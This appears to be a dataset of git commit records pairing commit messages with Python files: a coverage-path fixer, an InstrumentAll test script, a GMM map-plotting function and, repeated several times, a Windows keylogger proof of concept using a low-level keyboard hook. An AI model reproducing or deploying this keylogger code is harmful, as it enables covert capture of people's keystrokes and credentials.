d1_common.util.log_setup()
repo_root_path = d1_dev.util.find_repo_root()
logging.info('Repository: {}'.format(repo_root_path))
cov_xml_path = os.path.join(repo_root_path, 'coverage.xml')
fixed_cov_xml_path = os.path.join(repo_root_path, 'fixed_coverage.xml')
with open(cov_xml_path, 'rb') as f:
cov_tree = d1_common.type_conversions.str_to_etree(f.read())
filename_el_list = cov_tree.findall('.//*[@filename]')
for filename_el in filename_el_list:
filename_el.attrib['filename'] = os.path.join(
repo_root_path, filename_el.attrib['filename']
)
fixed_cov_xml = xml.etree.ElementTree.tostring(cov_tree, 'utf-8')
with open(fixed_cov_xml_path, 'wb') as f:
f.write(d1_common.xml.pretty_xml(fixed_cov_xml))
if __name__ == '__main__':
main()
|
Add script that fixes paths in coverage.xml for use in PyCharm#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyCharm can't resolve the relative paths written by pytest's coverage plugin.
This converts them to absolute, which PyCharm handles.
"""
import logging
import os
import xml.etree.ElementTree
import d1_dev.util
import d1_common.type_conversions
import d1_common.util
import d1_common.xml
def main():
d1_common.util.log_setup()
repo_root_path = d1_dev.util.find_repo_root()
logging.info('Repository: {}'.format(repo_root_path))
cov_xml_path = os.path.join(repo_root_path, 'coverage.xml')
fixed_cov_xml_path = os.path.join(repo_root_path, 'fixed_coverage.xml')
with open(cov_xml_path, 'rb') as f:
cov_tree = d1_common.type_conversions.str_to_etree(f.read())
filename_el_list = cov_tree.findall('.//*[@filename]')
for filename_el in filename_el_list:
filename_el.attrib['filename'] = os.path.join(
repo_root_path, filename_el.attrib['filename']
)
fixed_cov_xml = xml.etree.ElementTree.tostring(cov_tree, 'utf-8')
with open(fixed_cov_xml_path, 'wb') as f:
f.write(d1_common.xml.pretty_xml(fixed_cov_xml))
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Add script that fixes paths in coverage.xml for use in PyCharm<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""PyCharm can't resolve the relative paths written by pytest's coverage plugin.
This converts them to absolute, which PyCharm handles.
"""
import logging
import os
import xml.etree.ElementTree
import d1_dev.util
import d1_common.type_conversions
import d1_common.util
import d1_common.xml
def main():
d1_common.util.log_setup()
repo_root_path = d1_dev.util.find_repo_root()
logging.info('Repository: {}'.format(repo_root_path))
cov_xml_path = os.path.join(repo_root_path, 'coverage.xml')
fixed_cov_xml_path = os.path.join(repo_root_path, 'fixed_coverage.xml')
with open(cov_xml_path, 'rb') as f:
cov_tree = d1_common.type_conversions.str_to_etree(f.read())
filename_el_list = cov_tree.findall('.//*[@filename]')
for filename_el in filename_el_list:
filename_el.attrib['filename'] = os.path.join(
repo_root_path, filename_el.attrib['filename']
)
fixed_cov_xml = xml.etree.ElementTree.tostring(cov_tree, 'utf-8')
with open(fixed_cov_xml_path, 'wb') as f:
f.write(d1_common.xml.pretty_xml(fixed_cov_xml))
if __name__ == '__main__':
main()
|
|
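The heart of the coverage fixer above is a single pass that prefixes every filename attribute with the repository root. For reference, a stdlib-only sketch of the same transformation without the repository-internal d1_* helpers (the logging and pretty-printing steps are dropped, and the function name is made up):

import os
import xml.etree.ElementTree as ET

def absolutise_coverage(cov_xml_path, repo_root, out_path):
    tree = ET.parse(cov_xml_path)
    # coverage.xml records sources relative to the repo root; make each absolute
    for el in tree.getroot().iter():
        if "filename" in el.attrib:
            el.attrib["filename"] = os.path.join(repo_root, el.attrib["filename"])
    tree.write(out_path, encoding="utf-8")

absolutise_coverage("coverage.xml", os.getcwd(), "fixed_coverage.xml")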
2740cd71b836bfe86819aea9c4a71e64c42a5f2a
|
hooking.py
|
hooking.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 01:16:23 2016
@author: John Troony
"""
import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD
user32 = windll.user32
kernel32 = windll.kernel32
WH_KEYBOARD_LL=13
WM_KEYDOWN=0x0100
CTRL_CODE = 162
class KeyLogger:
keystrokesx = ''
def __init__(self):
self.lUser32 = user32
self.hooked = None
def installHookProc(self, pointer):
self.hooked = self.lUser32.SetWindowsHookExA(WH_KEYBOARD_LL, pointer,
kernel32.GetModuleHandleW(None),0)
if not self.hooked:
return False
return True
def uninstallHookProc(self):
if self.hooked is None:
return
self.lUser32.UnhookWindowsHookEx(self.hooked)
self.hooked = None
def getFPTR(fn):
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
return CMPFUNC(fn)
def hookProc(nCode, wParam, lParam):
if wParam is not WM_KEYDOWN:
return user32.CallNextHookEx(keyLogger.hooked, nCode,wParam, lParam)
hookedKey = chr(lParam[0])
keystrokesx += hookedKey
if(CTRL_CODE == int(lParam[0])):
print keystrokesx
print "Ctrl pressed, call uninstallHook()"
keyLogger.uninstallHookProc()
sys.exit(-1)
return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0,0,0)
keyLogger = KeyLogger() #start of hook process
pointer = getFPTR(hookProc)
if keyLogger.installHookProc(pointer):
print "installed keyLogger"
startKeyLog()
|
Add a Python PoC keylogger
|
Add a Python PoC keylogger
|
Python
|
cc0-1.0
|
JohnTroony/Scriptology,JohnTroony/Scriptology,JohnTroony/Scriptology,JohnTroony/Scriptology,JohnTroony/Scriptology,JohnTroony/Scriptology
|
Add a Python PoC keylogger
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 01:16:23 2016
@author: John Troony
"""
import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD
user32 = windll.user32
kernel32 = windll.kernel32
WH_KEYBOARD_LL=13
WM_KEYDOWN=0x0100
CTRL_CODE = 162
class KeyLogger:
keystrokesx = ''
def __init__(self):
self.lUser32 = user32
self.hooked = None
def installHookProc(self, pointer):
self.hooked = self.lUser32.SetWindowsHookExA(WH_KEYBOARD_LL, pointer,
kernel32.GetModuleHandleW(None),0)
if not self.hooked:
return False
return True
def uninstallHookProc(self):
if self.hooked is None:
return
self.lUser32.UnhookWindowsHookEx(self.hooked)
self.hooked = None
def getFPTR(fn):
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
return CMPFUNC(fn)
def hookProc(nCode, wParam, lParam):
if wParam is not WM_KEYDOWN:
return user32.CallNextHookEx(keyLogger.hooked, nCode,wParam, lParam)
hookedKey = chr(lParam[0])
keystrokesx += hookedKey
if(CTRL_CODE == int(lParam[0])):
print keystrokesx
print "Ctrl pressed, call uninstallHook()"
keyLogger.uninstallHookProc()
sys.exit(-1)
return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0,0,0)
keyLogger = KeyLogger() #start of hook process
pointer = getFPTR(hookProc)
if keyLogger.installHookProc(pointer):
print "installed keyLogger"
startKeyLog()
|
<commit_before><commit_msg>Add a Python PoC keylogger<commit_after>
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 01:16:23 2016
@author: John Troony
"""
import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD
user32 = windll.user32
kernel32 = windll.kernel32
WH_KEYBOARD_LL=13
WM_KEYDOWN=0x0100
CTRL_CODE = 162
class KeyLogger:
keystrokesx = ''
def __init__(self):
self.lUser32 = user32
self.hooked = None
def installHookProc(self, pointer):
self.hooked = self.lUser32.SetWindowsHookExA(WH_KEYBOARD_LL, pointer,
kernel32.GetModuleHandleW(None),0)
if not self.hooked:
return False
return True
def uninstallHookProc(self):
if self.hooked is None:
return
self.lUser32.UnhookWindowsHookEx(self.hooked)
self.hooked = None
def getFPTR(fn):
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
return CMPFUNC(fn)
def hookProc(nCode, wParam, lParam):
if wParam is not WM_KEYDOWN:
return user32.CallNextHookEx(keyLogger.hooked, nCode,wParam, lParam)
hookedKey = chr(lParam[0])
keystrokesx += hookedKey
if(CTRL_CODE == int(lParam[0])):
print keystrokesx
print "Ctrl pressed, call uninstallHook()"
keyLogger.uninstallHookProc()
sys.exit(-1)
return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0,0,0)
keyLogger = KeyLogger() #start of hook process
pointer = getFPTR(hookProc)
if keyLogger.installHookProc(pointer):
print "installed keyLogger"
startKeyLog()
|
Add a Python PoC keylogger# -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 01:16:23 2016
@author: John Troony
"""
import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD
user32 = windll.user32
kernel32 = windll.kernel32
WH_KEYBOARD_LL=13
WM_KEYDOWN=0x0100
CTRL_CODE = 162
class KeyLogger:
keystrokesx = ''
def __init__(self):
self.lUser32 = user32
self.hooked = None
def installHookProc(self, pointer):
self.hooked = self.lUser32.SetWindowsHookExA(WH_KEYBOARD_LL, pointer,
kernel32.GetModuleHandleW(None),0)
if not self.hooked:
return False
return True
def uninstallHookProc(self):
if self.hooked is None:
return
self.lUser32.UnhookWindowsHookEx(self.hooked)
self.hooked = None
def getFPTR(fn):
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
return CMPFUNC(fn)
def hookProc(nCode, wParam, lParam):
if wParam is not WM_KEYDOWN:
return user32.CallNextHookEx(keyLogger.hooked, nCode,wParam, lParam)
hookedKey = chr(lParam[0])
keystrokesx += hookedKey
if(CTRL_CODE == int(lParam[0])):
print keystrokesx
print "Ctrl pressed, call uninstallHook()"
keyLogger.uninstallHookProc()
sys.exit(-1)
return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0,0,0)
keyLogger = KeyLogger() #start of hook process
pointer = getFPTR(hookProc)
if keyLogger.installHookProc(pointer):
print "installed keyLogger"
startKeyLog()
|
<commit_before><commit_msg>Add a Python PoC keylogger<commit_after># -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 01:16:23 2016
@author: John Troony
"""
import sys
from ctypes import *
from ctypes.wintypes import MSG
from ctypes.wintypes import DWORD
user32 = windll.user32
kernel32 = windll.kernel32
WH_KEYBOARD_LL=13
WM_KEYDOWN=0x0100
CTRL_CODE = 162
class KeyLogger:
keystrokesx = ''
def __init__(self):
self.lUser32 = user32
self.hooked = None
def installHookProc(self, pointer):
self.hooked = self.lUser32.SetWindowsHookExA(WH_KEYBOARD_LL, pointer,
kernel32.GetModuleHandleW(None),0)
if not self.hooked:
return False
return True
def uninstallHookProc(self):
if self.hooked is None:
return
self.lUser32.UnhookWindowsHookEx(self.hooked)
self.hooked = None
def getFPTR(fn):
CMPFUNC = CFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
return CMPFUNC(fn)
def hookProc(nCode, wParam, lParam):
if wParam is not WM_KEYDOWN:
return user32.CallNextHookEx(keyLogger.hooked, nCode,wParam, lParam)
hookedKey = chr(lParam[0])
keystrokesx += hookedKey
if(CTRL_CODE == int(lParam[0])):
print keystrokesx
print "Ctrl pressed, call uninstallHook()"
keyLogger.uninstallHookProc()
sys.exit(-1)
return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam,lParam)
def startKeyLog():
msg = MSG()
user32.GetMessageA(byref(msg),0,0,0)
keyLogger = KeyLogger() #start of hook process
pointer = getFPTR(hookProc)
if keyLogger.installHookProc(pointer):
print "installed keyLogger"
startKeyLog()
|
|
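As committed, the PoC above cannot run: keystrokesx lives on the KeyLogger class, so the augmented assignment inside hookProc raises UnboundLocalError, and wParam is not WM_KEYDOWN tests object identity rather than value. A hedged drop-in replacement for that part of the script, in the same Python 2 style and using the names already defined above:

keystrokesx = ''

def hookProc(nCode, wParam, lParam):
    global keystrokesx
    if wParam != WM_KEYDOWN:  # compare by value; `is not` on integers is unreliable
        return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam, lParam)
    keystrokesx += chr(lParam[0])
    if int(lParam[0]) == CTRL_CODE:
        print keystrokesx
        keyLogger.uninstallHookProc()
        sys.exit(-1)
    return user32.CallNextHookEx(keyLogger.hooked, nCode, wParam, lParam)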
53a575f3b1da3e3edccc8f7e2d958134d724b3d4
|
testsuite/python/modDataSeq.py
|
testsuite/python/modDataSeq.py
|
# -*- coding: utf-8 -*-
## @file testsuite/python/modDataSeqTest.py
## @date feb. 2016
## @author PhRG - opticalp.fr
##
## Test the data push system
#
# Copyright (c) 2016 Ph. Renaud-Goud / Opticalp
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def myMain():
"""Main function. Run the tests. """
print "Test the basic features of the data push system. "
fac = Factory("DemoRootFactory")
print "Retrieved factory: " + fac.name
print "Create module from leafDataSeq factory"
mod1 = fac.select("branch").select("leafDataSeq").create("mod1")
print "module " + mod1.name + " created. "
print "Create module from leafSeqAccu factory"
mod2a = fac.select("branch").select("leafSeqAccu").create("mod2a")
print "module " + mod2a.name + " created. "
print "Create module from leafSeqMax factory"
mod2b = fac.select("branch").select("leafSeqAccu").create("mod2b")
print "module " + mod2b.name + " created. "
bind(mod1.outPorts()[0], mod2a.inPorts()[0])
bind(mod1.outPorts()[0], mod2b.inPorts()[0])
print "Query mod1 output targets: "
for target in mod1.outPorts()[0].getTargetPorts():
print ( target.name + ", from module: " +
target.parent().name )
# launch action
print "End of script modDataSeqTest.py"
# main body
import sys
import os
if len(sys.argv) >= 1:
# probably called from InstrumentAll
checker = os.path.basename(sys.argv[0])
if checker == "instrumentall":
print "current script: ",os.path.realpath(__file__)
from instru import *
myMain()
exit(0)
print "Presumably not called from InstrumentAll >> Exiting..."
exit("This script has to be launched from inside InstrumentAll")
|
Add a simple test for the push model
|
Add a simple test for the push model
|
Python
|
mit
|
Opticalp/instrumentall,Opticalp/instrumentall,Opticalp/instrumentall,Opticalp/instrumentall
|
Add a simple test for the push model
|
# -*- coding: utf-8 -*-
## @file testsuite/python/modDataSeqTest.py
## @date feb. 2016
## @author PhRG - opticalp.fr
##
## Test the data push system
#
# Copyright (c) 2016 Ph. Renaud-Goud / Opticalp
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def myMain():
"""Main function. Run the tests. """
print "Test the basic features of the data push system. "
fac = Factory("DemoRootFactory")
print "Retrieved factory: " + fac.name
print "Create module from leafDataSeq factory"
mod1 = fac.select("branch").select("leafDataSeq").create("mod1")
print "module " + mod1.name + " created. "
print "Create module from leafSeqAccu factory"
mod2a = fac.select("branch").select("leafSeqAccu").create("mod2a")
print "module " + mod2a.name + " created. "
print "Create module from leafSeqMax factory"
mod2b = fac.select("branch").select("leafSeqAccu").create("mod2b")
print "module " + mod2b.name + " created. "
bind(mod1.outPorts()[0], mod2a.inPorts()[0])
bind(mod1.outPorts()[0], mod2b.inPorts()[0])
print "Query mod1 output targets: "
for target in mod1.outPorts()[0].getTargetPorts():
print ( target.name + ", from module: " +
target.parent().name )
# launch action
print "End of script modDataSeqTest.py"
# main body
import sys
import os
if len(sys.argv) >= 1:
# probably called from InstrumentAll
checker = os.path.basename(sys.argv[0])
if checker == "instrumentall":
print "current script: ",os.path.realpath(__file__)
from instru import *
myMain()
exit(0)
print "Presumably not called from InstrumentAll >> Exiting..."
exit("This script has to be launched from inside InstrumentAll")
|
<commit_before><commit_msg>Add a simple test for the push model<commit_after>
|
# -*- coding: utf-8 -*-
## @file testsuite/python/modDataSeqTest.py
## @date feb. 2016
## @author PhRG - opticalp.fr
##
## Test the data push system
#
# Copyright (c) 2016 Ph. Renaud-Goud / Opticalp
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def myMain():
"""Main function. Run the tests. """
print "Test the basic features of the data push system. "
fac = Factory("DemoRootFactory")
print "Retrieved factory: " + fac.name
print "Create module from leafDataSeq factory"
mod1 = fac.select("branch").select("leafDataSeq").create("mod1")
print "module " + mod1.name + " created. "
print "Create module from leafSeqAccu factory"
mod2a = fac.select("branch").select("leafSeqAccu").create("mod2a")
print "module " + mod2a.name + " created. "
print "Create module from leafSeqMax factory"
mod2b = fac.select("branch").select("leafSeqAccu").create("mod2b")
print "module " + mod2b.name + " created. "
bind(mod1.outPorts()[0], mod2a.inPorts()[0])
bind(mod1.outPorts()[0], mod2b.inPorts()[0])
print "Query mod1 output targets: "
for target in mod1.outPorts()[0].getTargetPorts():
print ( target.name + ", from module: " +
target.parent().name )
# launch action
print "End of script modDataSeqTest.py"
# main body
import sys
import os
if len(sys.argv) >= 1:
# probably called from InstrumentAll
checker = os.path.basename(sys.argv[0])
if checker == "instrumentall":
print "current script: ",os.path.realpath(__file__)
from instru import *
myMain()
exit(0)
print "Presumably not called from InstrumentAll >> Exiting..."
exit("This script has to be launched from inside InstrumentAll")
|
Add a simple test for the push model# -*- coding: utf-8 -*-
## @file testsuite/python/modDataSeqTest.py
## @date feb. 2016
## @author PhRG - opticalp.fr
##
## Test the data push system
#
# Copyright (c) 2016 Ph. Renaud-Goud / Opticalp
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def myMain():
"""Main function. Run the tests. """
print "Test the basic features of the data push system. "
fac = Factory("DemoRootFactory")
print "Retrieved factory: " + fac.name
print "Create module from leafDataSeq factory"
mod1 = fac.select("branch").select("leafDataSeq").create("mod1")
print "module " + mod1.name + " created. "
print "Create module from leafSeqAccu factory"
mod2a = fac.select("branch").select("leafSeqAccu").create("mod2a")
print "module " + mod2a.name + " created. "
print "Create module from leafSeqMax factory"
mod2b = fac.select("branch").select("leafSeqAccu").create("mod2b")
print "module " + mod2b.name + " created. "
bind(mod1.outPorts()[0], mod2a.inPorts()[0])
bind(mod1.outPorts()[0], mod2b.inPorts()[0])
print "Query mod1 output targets: "
for target in mod1.outPorts()[0].getTargetPorts():
print ( target.name + ", from module: " +
target.parent().name )
# launch action
print "End of script modDataSeqTest.py"
# main body
import sys
import os
if len(sys.argv) >= 1:
# probably called from InstrumentAll
checker = os.path.basename(sys.argv[0])
if checker == "instrumentall":
print "current script: ",os.path.realpath(__file__)
from instru import *
myMain()
exit(0)
print "Presumably not called from InstrumentAll >> Exiting..."
exit("This script has to be launched from inside InstrumentAll")
|
<commit_before><commit_msg>Add a simple test for the push model<commit_after># -*- coding: utf-8 -*-
## @file testsuite/python/modDataSeqTest.py
## @date feb. 2016
## @author PhRG - opticalp.fr
##
## Test the data push system
#
# Copyright (c) 2016 Ph. Renaud-Goud / Opticalp
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def myMain():
"""Main function. Run the tests. """
print "Test the basic features of the data push system. "
fac = Factory("DemoRootFactory")
print "Retrieved factory: " + fac.name
print "Create module from leafDataSeq factory"
mod1 = fac.select("branch").select("leafDataSeq").create("mod1")
print "module " + mod1.name + " created. "
print "Create module from leafSeqAccu factory"
mod2a = fac.select("branch").select("leafSeqAccu").create("mod2a")
print "module " + mod2a.name + " created. "
print "Create module from leafSeqMax factory"
mod2b = fac.select("branch").select("leafSeqAccu").create("mod2b")
print "module " + mod2b.name + " created. "
bind(mod1.outPorts()[0], mod2a.inPorts()[0])
bind(mod1.outPorts()[0], mod2b.inPorts()[0])
print "Query mod1 output targets: "
for target in mod1.outPorts()[0].getTargetPorts():
print ( target.name + ", from module: " +
target.parent().name )
# launch action
print "End of script modDataSeqTest.py"
# main body
import sys
import os
if len(sys.argv) >= 1:
# probably called from InstrumentAll
checker = os.path.basename(sys.argv[0])
if checker == "instrumentall":
print "current script: ",os.path.realpath(__file__)
from instru import *
myMain()
exit(0)
print "Presumably not called from InstrumentAll >> Exiting..."
exit("This script has to be launched from inside InstrumentAll")
|
|
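One inconsistency worth flagging in the test above: the mod2b block prints "Create module from leafSeqMax factory" but then selects "leafSeqAccu", so mod2a and mod2b come from the same factory. Assuming the print statement reflects the intent, the corrected line would presumably be:

mod2b = fac.select("branch").select("leafSeqMax").create("mod2b")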
7b660d90dd7e9c1518a925a174d43180a46f5d4d
|
src/utils/plot_gmm.py
|
src/utils/plot_gmm.py
|
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
@staticmethod
def plot_gmm(gmm, true_ll=False):
"""Plots the contour map of a GMM on top of a world map
Partially from: http://matplotlib.org/basemap/users/examples.html
Will also plot the best estimated location as well as a true location if passed in"""
plt.figure()
x = np.linspace(-180,180, num=3600)
y = np.linspace(90,-90, num=180)
#GMM uses lat, lon so must flip in to obtain the contours correctly
X, Y = np.meshgrid(y,x)
XX = np.array([X.ravel(), Y.ravel()]).T
#Obtains the per-sample log probabilities of the data under the model
Z = -gmm.score_samples(XX)[0]
Z = Z.reshape(X.shape)
#set up and draw the world map
m = Basemap(projection='mill', lon_0=0)
m.drawcountries()
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1]) # draw meridians
cmap = mpl.cm.pink
#for plotting we want to be back in lon, lat space so flip back
X, Y = m(Y,X)
#plot the contour lines as well as a color bar
CS = m.contourf(X, Y, Z, 25, cmap=cmap)
CB = plt.colorbar(CS, shrink=0.8, extend='both')
# Plot estimated location
(best_lat, best_lon) = gmm.means_[np.argmax(gmm.weights_)]
best_lat, best_lon = m(best_lon, best_lat)
plt.plot(best_lat, best_lon, '*g')
# If provided also plot the true lat/lon expected to come in as lat,lon
if true_ll:
lat, lon = m(true_ll[1], true_ll[0])
plt.plot(lat, lon, '*b')
#plots the center of each ellipse and weights the size relative to the weight of the ellipse on the model
for i in range (0, gmm.n_components):
lat, lon = gmm.means_[i]
weight = gmm.weights_[i]
x, y = m(lon, lat)
plt.plot(x, y, 'ok', markersize=10*weight)
plt.show()
|
Add a method which will plot the contour map of a GMM on a map of the world as well as the best location and true position if given
|
Add a method which will plot the contour map of a GMM on a map of the world as well as the best location and true position if given
|
Python
|
apache-2.0
|
vivek8943/soft-boiled
|
Add a method which will plot the contour map of a GMM on a map of the world as well as the best location and true position if given
|
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
@staticmethod
def plot_gmm(gmm, true_ll=False):
"""Plots the contour map of a GMM on top of a world map
Partially from: http://matplotlib.org/basemap/users/examples.html
Will also plot the best estimated location as well as a true location if passed in"""
plt.figure()
x = np.linspace(-180,180, num=3600)
y = np.linspace(90,-90, num=180)
#GMM uses lat, lon so must flip in to obtain the contours correctly
X, Y = np.meshgrid(y,x)
XX = np.array([X.ravel(), Y.ravel()]).T
#Obtains the per-sample log probabilities of the data under the model
Z = -gmm.score_samples(XX)[0]
Z = Z.reshape(X.shape)
#set up and draw the world map
m = Basemap(projection='mill', lon_0=0)
m.drawcountries()
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1]) # draw meridians
cmap = mpl.cm.pink
#for plotting we want to be back in lon, lat space so flip back
X, Y = m(Y,X)
#plot the contour lines as well as a color bar
CS = m.contourf(X, Y, Z, 25, cmap=cmap)
CB = plt.colorbar(CS, shrink=0.8, extend='both')
# Plot estimated location
(best_lat, best_lon) = gmm.means_[np.argmax(gmm.weights_)]
best_lat, best_lon = m(best_lon, best_lat)
plt.plot(best_lat, best_lon, '*g')
# If provided also plot the true lat/lon expected to come in as lat,lon
if true_ll:
lat, lon = m(true_ll[1], true_ll[0])
plt.plot(lat, lon, '*b')
#plots the center of each ellipse and weights the size relative to the weight of the ellipse on the model
for i in range (0, gmm.n_components):
lat, lon = gmm.means_[i]
weight = gmm.weights_[i]
x, y = m(lon, lat)
plt.plot(x, y, 'ok', markersize=10*weight)
plt.show()
|
<commit_before><commit_msg>Add a method which will plot the contour map of a GMM on a map of the world as well as the best location and true position if given<commit_after>
|
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
@staticmethod
def plot_gmm(gmm, true_ll=False):
"""Plots the contour map of a GMM on top of a world map
Partially from: http://matplotlib.org/basemap/users/examples.html
Will also plot the best estimated location as well as a true location if passed in"""
plt.figure()
x = np.linspace(-180,180, num=3600)
y = np.linspace(90,-90, num=180)
#GMM uses lat, lon so must flip in to obtain the contours correctly
X, Y = np.meshgrid(y,x)
XX = np.array([X.ravel(), Y.ravel()]).T
#Obtains the per-sample log probabilities of the data under the model
Z = -gmm.score_samples(XX)[0]
Z = Z.reshape(X.shape)
#set up and draw the world map
m = Basemap(projection='mill', lon_0=0)
m.drawcountries()
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0]) # draw parallels
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1]) # draw meridians
cmap = mpl.cm.pink
#for plotting we want to be back in lon, lat space so flip back
X, Y = m(Y,X)
#plot the contour lines as well as a color bar
CS = m.contourf(X, Y, Z, 25, cmap=cmap)
CB = plt.colorbar(CS, shrink=0.8, extend='both')
# Plot estimated location
